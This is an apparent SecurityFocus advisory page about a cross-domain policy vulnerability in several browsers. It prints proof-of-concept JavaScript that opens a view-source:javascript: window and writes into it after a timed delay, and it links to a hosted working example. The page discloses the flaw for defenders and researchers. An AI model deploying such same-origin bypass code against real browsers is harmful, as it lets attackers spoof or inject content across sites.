Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Multiple Browser Timed Document.Write Method Cross Domain Policy Vulnerability

The following example code has been made available:

<script>
function werd()
{
a.document.open();
a.document.write("<h1>werd</h1>");
a.document.close();
}

function winopen() {

a=window.open("view-source:javascript:location='http://www.example.com';");

setTimeout('werd()',23000);
}

</script>

A working example has been placed at http://meme-boi.netfirms.com/werd.html.







 

Privacy Statement
Copyright 2009, SecurityFocus